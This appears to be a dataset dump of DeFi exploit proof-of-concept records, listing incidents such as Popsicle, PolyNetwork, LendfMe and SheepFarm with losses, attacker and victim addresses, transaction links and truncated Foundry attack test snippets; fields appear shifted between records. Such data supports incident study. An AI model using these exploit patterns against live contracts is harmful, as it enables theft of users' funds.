a4c5b55759d96032
2026-01-07T10:59:16.534227
postmortems
ethereum
20,737,848
$1.7k
1,700
https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348
https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3
https://etherscan.io/address/0x03f911aedc25c770e701b8f563e8102cfacd62c0
https://etherscan.io/tx/0x1a3e9eb5e00f39e84f90ca23bd851aa194b1e7a90003e3f6b9b17bbb66dabbb9
https://x.com/TenArmorAlert/status/1834488796953673862
https://x.com/TenArmorAlert/status/1834488796953673862
true
true
false
low
$1.7k
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); // deal(address(attC), 0.7370354703656878 ether); // give only ether deal(weth9, addr...
true
$1.7k
https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348
https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3
https://etherscan.io/address/0x03f911aedc25c770e701b8f563e8102cfacd62c0
https://etherscan.io/tx/0x1a3e9eb5e00f39e84f90ca23bd851aa194b1e7a90003e3f6b9b17bbb66dabbb9
https://x.com/TenArmorAlert/status/1834488796953673862
https://x.com/TenArmorAlert/status/1834488796953673862
$1.7K
7.32
medium
unverified_03f9 Exploit (2024-09)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; address constant attacker = 0xfe51ffcd2af4748d77130646988F966733583dc1; address constant addr1 = 0xb3094734FE249A7b0110dC12D66F6C404aDA28Cb; address constant weth = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; // @KeyInfo - Total Lost : ...
exploit_poc
unverified_a89f
2024-09
unverified_a89f_exp.sol
null
1eee2ebe0517f264
2026-01-07T10:59:16.534273
postmortems
ethereum
20,683,453
$1.5k
1,500
https://etherscan.io/address/0xfe51ffcd2af4748d77130646988f966733583dc1
https://etherscan.io/address/0xa826dacf14a462bca2a6e4de4c27f20ed7b43b1d
https://etherscan.io/address/0xb3094734fe249a7b0110dc12d66f6c404ada28cb
https://app.blocksec.com/explorer/tx/eth/0x83c71a83656b0fecfa860e76a9becf738930b3f1b2510c7d0339ab585090a82d
https://x.com/TenArmorAlert/status/1831637553415610877
https://x.com/TenArmorAlert/status/1831637553415610877
true
true
false
low
$1.5k
unknown
function testPoC() public { vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2).balanceOf(address(attC)), 18);...
true
$1.5k
https://etherscan.io/address/0xfe51ffcd2af4748d77130646988f966733583dc1
https://etherscan.io/address/0xa826dacf14a462bca2a6e4de4c27f20ed7b43b1d
https://etherscan.io/address/0xb3094734fe249a7b0110dc12d66f6c404ada28cb
https://app.blocksec.com/explorer/tx/eth/0x83c71a83656b0fecfa860e76a9becf738930b3f1b2510c7d0339ab585090a82d
https://x.com/TenArmorAlert/status/1831637553415610877
https://x.com/TenArmorAlert/status/1831637553415610877
$1.5K
7.11
medium
unverified_a89f Exploit (2024-09)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 1.4K USD // Attacker : 0x7248939f65bdd23aab9eaab1bc4a4f909567486e // Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 // Vulnerable Contract : // Attack Tx : https://ap...
exploit_poc
PestoToken
2024-09
PestoToken_exp.sol
null
51694bac01db08e1
2026-01-07T10:59:16.534328
postmortems
ethereum
20,811,949
1.4K USD
1,400
null
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
null
https://app.blocksec.com/explorer/tx/eth/0x3d5b4a0d560e8dd750239b578e2b85921b523835b644714dc239a2db70cf067c
https://x.com/TenArmorAlert/status/1838225968009527652
https://x.com/TenArmorAlert/status/1838225968009527652
true
true
false
low
1.4K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack{value: 4.59e-16 ether}(); vm.stopPrank(); emit log_named_decimal_...
true
1.4K USD
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
https://app.blocksec.com/explorer/tx/eth/0x3d5b4a0d560e8dd750239b578e2b85921b523835b644714dc239a2db70cf067c
https://x.com/TenArmorAlert/status/1838225968009527652
https://x.com/TenArmorAlert/status/1838225968009527652
$1.4K
8
high
PestoToken Exploit (2024-09)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 283 USD // Attacker : https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e // Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 // Vulnerable Contract ...
exploit_poc
HANAToken
2024-09
HANAToken_exp.sol
null
671ff95c81bcf0c5
2026-01-07T10:59:16.534400
postmortems
ethereum
20,827,436
283 USD
283
https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
https://etherscan.io/address/0xb3912b20b3abc78c15e85e13ec0bf334fbb924f7
https://app.blocksec.com/explorer/tx/eth/0xe8cee3450545a865b4a8fffd93938ae93429574dc8e01b02bc6a02f2f4490e4e
https://x.com/TenArmorAlert/status/1838963740731203737
https://x.com/TenArmorAlert/status/1838963740731203737
true
true
false
low
283 USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack{value: 3.9e-16 ether}(); vm.stopPrank(); emit log_named_decimal_u...
true
283 USD
https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
https://etherscan.io/address/0xb3912b20b3abc78c15e85e13ec0bf334fbb924f7
https://app.blocksec.com/explorer/tx/eth/0xe8cee3450545a865b4a8fffd93938ae93429574dc8e01b02bc6a02f2f4490e4e
https://x.com/TenArmorAlert/status/1838963740731203737
https://x.com/TenArmorAlert/status/1838963740731203737
$283
9
high
HANAToken Exploit (2024-09)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $6.8k // Attacker : https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc // Attack Contract : https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a, https://bscscan.com/addres...
exploit_poc
AIRBTC
2024-09
AIRBTC_exp.sol
null
109098d98eb1652c
2026-01-07T10:59:16.534462
postmortems
bsc
42,157,592
$6.8k
6,800
https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc
https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a,
https://bscscan.com/address/0x12050e4355a392162698c6cf30eb8c9e0777300d
https://app.blocksec.com/explorer/tx/bsc/0x00e4bbc86369d67e21b1910c4f9178c8257ce96192039a7839bd4d3593e1cd27
https://x.com/TenArmorAlert/status/1833825098962550802
https://x.com/TenArmorAlert/status/1833825098962550802
true
true
false
low
$6.8k
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x55d398326f99059fF775485246999027B3197955).balanceOf(attacker), 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_u...
true
$6.8k
https://bscscan.com/address/0xcc116696f9852c238a5c8d3d96418ddba02357fc
https://bscscan.com/address/0x62f57a14c2e8f3ac9db05b81c8170d60f91f1b7a,
https://bscscan.com/address/0x12050e4355a392162698c6cf30eb8c9e0777300d
https://app.blocksec.com/explorer/tx/bsc/0x00e4bbc86369d67e21b1910c4f9178c8257ce96192039a7839bd4d3593e1cd27
https://x.com/TenArmorAlert/status/1833825098962550802
https://x.com/TenArmorAlert/status/1833825098962550802
$6.8K
7.81
medium
AIRBTC Exploit (2024-09)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $12K // Attacker : https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de // Attack Contract : // Vulnerable Contract : // Attack Tx : https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fc...
exploit_poc
unverified_5697
2024-09
unverified_5697_exp.sol
null
36bf1f24a6a7aebd
2026-01-07T10:59:16.534510
postmortems
ethereum
20,738,427
$12K
12,000
https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de
null
null
https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fce3250b9d2de2611384b8af258e83f7a711f666917c5590d13d2
https://x.com/TenArmorAlert/status/1834432197375533433
https://x.com/TenArmorAlert/status/1834432197375533433
true
true
false
medium
$12K
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(weth9).balanceOf(attacker), 18); vm.startPrank(addr2); IWETH9(weth9).approve(attacker, type(uint256).max); vm.stopPrank(); vm.startPrank(attacker, attacker); IWETH9(weth9)...
true
$12K
https://etherscan.io/address/0x0000daaee5fbc2d3fc5a5c0cb456d2c24e4f81de
https://app.blocksec.com/explorer/tx/eth/0x3f0dc68dc89fce3250b9d2de2611384b8af258e83f7a711f666917c5590d13d2
https://x.com/TenArmorAlert/status/1834432197375533433
https://x.com/TenArmorAlert/status/1834432197375533433
$12.0K
5.75
medium
unverified_5697 Exploit (2024-09)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 21 ETH // Attacker : https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0 // Attack Contract : https://etherscan.io/address/0x542533536e314180e1b9f00b2c046...
exploit_poc
Pythia
2024-09
Pythia_exp.sol
null
7a1810e894828ba6
2026-01-07T10:59:16.534554
postmortems
ethereum
null
21 ETH
21
https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0
https://etherscan.io/address/0x542533536e314180e1b9f00b2c046f6282eb3647
https://etherscan.io/address/0xe2910b29252F97bb6F3Cc5E66BfA0551821C7461
https://etherscan.io/tx/0x7e19f8edb1f1666322113f15d7674593950ac94bbc25d2aff96adabdcae0a6c3
null
https://x.com/QuillAudits_AI/status/1830976830607892649
true
true
false
low
21 ETH
unknown
function testExploit() public balanceLog { //implement exploit code here vm.deal(address(this), 1 ether); AttackContract attackContract = new AttackContract(); attackContract.stake{value: 0.5 ether}(); attackContract.claimRewards(); } } contract AttackContract { address...
true
21 ETH
https://etherscan.io/address/0xd861e6f1760d014d6ee6428cf7f7d732563c74c0
https://etherscan.io/address/0x542533536e314180e1b9f00b2c046f6282eb3647
https://etherscan.io/address/0xe2910b29252F97bb6F3Cc5E66BfA0551821C7461
https://etherscan.io/tx/0x7e19f8edb1f1666322113f15d7674593950ac94bbc25d2aff96adabdcae0a6c3
https://x.com/QuillAudits_AI/status/1830976830607892649
$21
7.81
medium
Pythia Exploit (2024-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Lendf.Me Reentry Exploit PoC See https://peckshield.medium.com/uniswap-lendf-me-hacks-root-cause-and-loss-analysis-50f3263dcc09 for more detail Example tx - https://etherscan.io/tx/0xae7d664bd...
exploit_poc
LendfMe
2020-04
LendfMe_exp.sol
null
13c4d010ba631155
2026-01-07T10:59:16.534604
postmortems
ethereum
9,899,725
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_uint("[Before Attack]Victim imBTC Balance : ", (imBTC.balanceOf(victim))); emit log_named_uint("[Before Attack]Attacker imBTC Balance : ", (imBTC.balanceOf(attacker))); // prepare imBTC.approve(victim, type(uint256).max); erc1820.se...
true
Unknown
3.54
low
LendfMe Exploit (2020-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // import "./utils.sol"; interface IEthCrossChainManager { function verifyHeaderAndExecuteTx( bytes memory proof, bytes memory rawHeader, bytes memory headerProof, ...
exploit_poc
PolyNetwork
2021-08
PolyNetwork_exp.sol
null
c2159157b5db1bcb
2026-01-07T10:59:16.534731
postmortems
ethereum
12,996,658
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { // "Poly has a contract called the "EthCrossChainManager". It's a privileged contract that has the right to trigger messages from another chain. It's a standard thing for cross-chain projects. // It has a function named verifyHeaderAndExecuteTx that anyone can call to ex...
true
Unknown
5
medium
PolyNetwork Exploit (2021-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Analysis // https://medium.com/@Knownsec_Blockchain_Lab/wault-finance-flash-loan-security-incident-analysis-368a2e1ebb5b // https://inspexco.medium.com/wault-finance-incident-analysis-wex-price...
exploit_poc
WaultFinance
2021-08
WaultFinance_exp.sol
null
bae5f93d778db7d8
2026-01-07T10:59:16.534841
postmortems
bsc
9,728,755
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { // borrow WUSD Pair1Amount = WUSD.balanceOf(address(Pair1)) - 1; Pair1.swap(Pair1Amount, 0, address(this), new bytes(1)); // WUSD to BUSD WUSD.approve(address(Router), type(uint256).max); WUSDToBUSD(); emit log_named_decimal_uint(...
true
Unknown
3.96
low
WaultFinance Exploit (2021-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { AMP amp = AMP(0xfF20817765cB7f73d4bde2e66e067E58D11095C2); IERC1820Regi...
exploit_poc
Cream
2021-08
Cream_exp.sol
null
cf6b222e9adaa83d
2026-01-07T10:59:16.534894
postmortems
unknown
13,125,070
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test() public { payable(address(0)).transfer(address(this).balance); ierc1820.setInterfaceImplementer(address(this), TOKENS_RECIPIENT_INTERFACE_HASH, address(this)); mywallet = msg.sender; uni.swap(0, 500 * 1e18, address(this), "0x00"); emit log_named_uint("Exploit comp...
true
Unknown
3.54
low
Cream Exploit (2021-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "forge-std/interfaces/IERC20.sol"; // @KeyInfo - Total Lost : 20M USD // Attacker : https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52 // Attack Contract : https://etherscan.io/address/0xdFb6faB7f4bc9...
exploit_poc
Popsicle
2021-08
Popsicle_exp.sol
flash_loan
fa46d52c56978dbe
2026-01-07T10:59:16.534946
postmortems
ethereum
12,955,000
20M USD
20,000,000
https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52
https://etherscan.io/address/0xdFb6faB7f4bc9512d5620e679E90D1C91C4EAdE6
https://etherscan.io/address/0xc4ff55a4329f84f9Bf0F5619998aB570481EBB48
https://etherscan.io/tx/0xcd7dae143a4c0223349c16237ce4cd7696b1638d116a72755231ede872ab70fc
https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1
https://twitter.com/BlockSecTeam/status/1422786223156776968
true
true
true
critical
20M USD
flash-loan
function testExploit() public balanceLog { _logBalances("Before attack"); aaveV2.flashLoan(address(this), assetsArr, amountsArr, modesArr, address(this), new bytes(0), 0); _logBalances("After attack"); }
true
20M USD
https://etherscan.io/address/0xf9E3D08196F76f5078882d98941b71C0884BEa52
https://etherscan.io/address/0xdFb6faB7f4bc9512d5620e679E90D1C91C4EAdE6
https://etherscan.io/address/0xc4ff55a4329f84f9Bf0F5619998aB570481EBB48
https://etherscan.io/tx/0xcd7dae143a4c0223349c16237ce4cd7696b1638d116a72755231ede872ab70fc
https://blocksecteam.medium.com/the-analysis-of-the-popsicle-finance-security-incident-9d9d5a3045c1
https://twitter.com/BlockSecTeam/status/1422786223156776968
$20.00M
10
high
Popsicle Exploit (2021-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; interface IpancakePair { function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata da...
exploit_poc
XSURGE
2021-08
XSURGE_exp.sol
null
a7e672ca271e6427
2026-01-07T10:59:16.535025
postmortems
unknown
10,087,723
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { payable(address(0)).transfer(address(this).balance); ipancake.swap(0, 10_000 * 1e18, address(this), "0x00"); // wbnb.withdraw(wbnb.balanceOf(address(this))); // VISR_Balance = visr.balanceOf(msg.sender); //emit log_named_uint("WBNB Balance",wbnb.b...
true
Unknown
3.43
low
XSURGE Exploit (2021-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Attack reason: Wrong function logic // Info about attack: https://twitter.com/BlockSecTeam/status/1592734292727455744 // Tx: https://bscscan.com/tx/0x8b3e0e3ea04829f941ca24c85032c3b4aeb1f8b1b27...
exploit_poc
SheepFarm2
2022-11
SheepFarm2_exp.sol
null
d52f738f6c3b78f4
2026-01-07T10:59:16.535070
postmortems
bsc
23,089,184
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { uint256 beforeBalance = address(this).balance; for (uint256 i; i < 4; ++i) { new AttackContract{value: 5e14}(); } uint256 afterBalance = address(this).balance; emit log_named_decimal_uint( "SheepFarm exploiter profit afte...
true
Unknown
2.94
low
SheepFarm2 Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1595142246570958848 // @TX // https://phalcon.blocksec.com/tx/bsc/0xb3bc6ca257387eae1cea3b997eb489c1a9c208d09ec4d117198029277468e25d // https:...
exploit_poc
AUR
2022-11
AUR_exp.sol
null
07f4e4e524f83680
2026-01-07T10:59:16.535116
postmortems
unknown
23,282,134
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { AUR.approve(address(AurumNodePool), type(uint256).max); AUR.approve(address(Router), type(uint256).max); emit log_named_decimal_uint("[Start] Attacker BNB balance before exploit", address(this).balance, 18); BNBtoAUR(0.01 ether); AurumNodePool.c...
true
Unknown
3.7
low
AUR Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1588579143830343683 // TX // https://bscscan.com/tx/0xe7b7c974e51d8bca3617f927f86bf907a25991fe654f457991cbf656b190fe94 interface BvaultsStr...
exploit_poc
BDEX
2022-11
BDEX_exp.sol
null
f883b0810e32612c
2026-01-07T10:59:16.535168
postmortems
bsc
22,629,431
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { address(WBNB).call{value: 34 ether}(""); uint256 amountin = WBNB.balanceOf(address(this)); WBNB.transfer(address(Pair), amountin); (uint256 BDEXReserve, uint256 WBNBReserve,) = Pair.getReserves(); uint256 amountout = (998 * amountin * BDEXReserve) ...
true
Unknown
3.12
low
BDEX Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1595346020237352960 // @TX // https://etherscan.io/tx/0x8a8145ab28b5d2a2e61d74c02c12350731f479b3175893de2014124f998bff32 interface Multicha...
exploit_poc
NUM
2022-11
NUM_exp.sol
null
4a86d4cb2ff57c56
2026-01-07T10:59:16.535214
postmortems
ethereum
16,029,969
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.27
low
NUM Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://eigenphi.substack.com/p/casting-a-magic-spell-on-abracadabra // https://twitter.com/BlockSecTeam/status/1603633067876155393 // @TX // https://etherscan.io/tx/0x3d163bfbec56...
exploit_poc
Kashi
2022-11
Kashi_exp.sol
flash_loan
b0759add92684886
2026-01-07T10:59:16.535257
postmortems
ethereum
15,928,289
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { MIM.approve(address(Router), type(uint256).max); address[] memory receivers = new address[](2); receivers[0] = address(this); receivers[1] = address(this); address[] memory tokens = new address[](2); tokens[0] = address(xSUSHI); tok...
true
Unknown
5.25
medium
Kashi Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1590960299246780417 // https://twitter.com/BeosinAlert/status/1591012525914861570 // https://twitter.com/AnciliaInc/status/15908391047316848...
exploit_poc
DFX
2022-11
DFX_exp.sol
null
c8b48e8dc5ce625b
2026-01-07T10:59:16.535314
postmortems
ethereum
15,941,703
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { address(WETH).call{value: 2 ether}(""); WETH.approve(address(Router), type(uint256).max); USDC.approve(address(Router), type(uint256).max); USDC.approve(address(dfx), type(uint256).max); XIDR.approve(address(Router), type(uint256).max); XID...
true
Unknown
4.08
low
DFX Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/CertiKAlert/status/1593094922160128000 // @Tx // https://bscscan.com/tx/0xb83f9165952697f27b1c7f932bcece5dfa6f0d2f9f3c3be2bb325815bfd834ec // https://bscscan.co...
exploit_poc
UEarnPool
2022-11
UEarnPool_exp.sol
null
246479a2e284e3cf
2026-01-07T10:59:16.535377
postmortems
bsc
23,120,167
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { contractFactory(); // bind invitor (bool success,) = contractList[0].call(abi.encodeWithSignature("bind(address)", tx.origin)); require(success); for (uint256 i = 1; i < 22; i++) { (bool success,) = contractList[i].call(abi.encodeWithSi...
true
Unknown
4.91
low
UEarnPool Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // attacker tx: https://etherscan.io/tx/0xeaef2831d4d6bca04e4e9035613be637ae3b0034977673c1c2f10903926f29c0 // offcial post-mortem: https://medium.com/neptune-mutual/decoding-brahma-brahtopg-smart-c...
exploit_poc
BrahTOPG
2022-11
BrahTOPG_exp.sol
null
e7732fc16a03da22
2026-01-07T10:59:16.535438
postmortems
ethereum
15,933,794
null
null
null
null
null
null
https://medium.com/neptune-mutual/decoding-brahma-brahtopg-smart-contract-vulnerability-7b7c364b79d8
null
false
false
false
medium
null
unknown
function testExploit() public { address(WETH).call{value: 1e15}(""); WETHToFRAX(); uint256 balance = USDC.balanceOf(victimAddress); uint256 allowance = USDC.allowance(victimAddress, address(zappper)); uint256 amount = balance; if (balance > allowance) { amount...
true
Unknown
3.5
low
BrahTOPG Exploit (2022-11)
false
false
false
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1592658104394473472 // https://twitter.com/BlockSecTeam/status/1592734292727455744 // @Tx // https://bscscan.com/tx/0x5735026e5de6d1968ab5baef...
exploit_poc
SheepFarm
2022-11
SheepFarm_exp.sol
null
5863e043a1e95d78
2026-01-07T10:59:16.535482
postmortems
bsc
23,088,156
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public payable { for (uint8 i = 0; i < 200; i++) { sheepFram.register(neighbor); } sheepFram.addGems{value: 5 * 1e14}(); for (uint8 i = 0; i < 3; i++) { sheepFram.upgradeVillage(i); } sheepFram.sellVillage(); uint256 ...
true
Unknown
2.81
low
SheepFarm Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; // Attacker: 0xae39a6c2379bef53334ea968f4c711c8cf3898b6 // Vulnerable Contract: 0x0ad8229d4bc84135786ae752b9a9d53392a8afd4 // Attack Tx: https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164...
exploit_poc
MEV_0ad8
2022-11
MEV_0ad8_exp.sol
null
3d130f973e36c04b
2026-01-07T10:59:16.535523
postmortems
ethereum
15,926,096
null
null
null
null
null
https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164a8009df98386a0
null
null
false
true
false
medium
null
unknown
false
https://phalcon.blocksec.com/tx/eth/0x674f74b30a3d7bdf15fa60a7c29d96a402ea894a055f624164a8009df98386a0
Unknown
3.23
low
MEV_0ad8 Exploit (2022-11)
false
false
true
false
//SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1597493955939405825 // https://twitter.com/CertiKAlert/status/1597513374841044993 // https://twitter.com/BeosinAlert/status/1597535796621631489 // @TX...
exploit_poc
SEAMAN
2022-11
SEAMAN_exp.sol
flash_loan
96c4aacf51c8a63f
2026-01-07T10:59:16.535563
postmortems
bsc
23,467,515
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { DVM(dodo).flashLoan(0, 800_000 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 18); }
true
Unknown
4.32
low
SEAMAN Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1597742575623888896 // https://twitter.com/CertiKAlert/status/1597639717096460288 // @TX // https://phalcon.blocksec.com/tx/bsc/0xdc53a6b5bf8e...
exploit_poc
MBC_ZZSH
2022-11
MBC_ZZSH_exp.sol
flash_loan
6080b5b6c5787868
2026-01-07T10:59:16.535605
postmortems
unknown
23,474,460
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { USDT.approve(address(Router), type(uint256).max); MBC.approve(address(Router), type(uint256).max); ZZSH.approve(address(Router), type(uint256).max); dodoFlahloanAmount = USDT.balanceOf(dodo); DVM(dodo).flashLoan(0, dodoFlahloanAmount, address(this)...
true
Unknown
4.96
low
MBC_ZZSH Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~1.4K USD // TX : https://app.blocksec.com/explorer/tx/optimism/0x9f34ae044cbbf3f1603769dcd90163add48348dde7e1dda41817991935ebfa2f // Attacker : https://optimistic.ethe...
exploit_poc
Polynomial
2022-11
Polynomial_exp.sol
null
8cd68d272e818dd3
2026-01-07T10:59:16.535656
postmortems
ethereum
39,343,642
~1.4K USD
1,400
https://optimistic.etherscan.io/address/0xcf8396010fb7e651f85a439dd7ebc0c8ab56b3f3
https://optimistic.etherscan.io/address/0xf682e302f16c9509ffa133029ccf6de55f4e29a8
null
null
null
null
true
false
false
low
~1.4K USD
unknown
function testExploit() public { attack(); }
true
https://optimistic.etherscan.io/address/0xcf8396010fb7e651f85a439dd7ebc0c8ab56b3f3
https://optimistic.etherscan.io/address/0xf682e302f16c9509ffa133029ccf6de55f4e29a8
$1.4K
5.71
medium
Polynomial Exploit (2022-11)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1593690338526273536 // @TX // https://bscscan.com/tx/0x3757d177482171dcfad7066c5e88d6f0f0fe74b28f32e41dd77137cad859c777 contract ContractTest...
exploit_poc
Annex
2022-11
Annex_exp.sol
flash_loan
41dace566c4fb2fb
2026-01-07T10:59:16.535702
postmortems
bsc
23,165,446
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { MyERC20 MyToken = new MyERC20(); Token = address(MyToken); MyToken.mint(10 * 1e18); DVM(dodo).flashLoan(8 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanceOf(address(this...
true
Unknown
5.27
medium
Annex Exploit (2022-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/8olidity/status/1594693686398316544 // https://twitter.com/CertiKAlert/status/1594615286556393478 // @TX // https://bscscan.com/tx/0xb3ac111d294ea9dedfd99349304...
exploit_poc
SDAO
2022-11
SDAO_exp.sol
flash_loan
8831835584fc9151
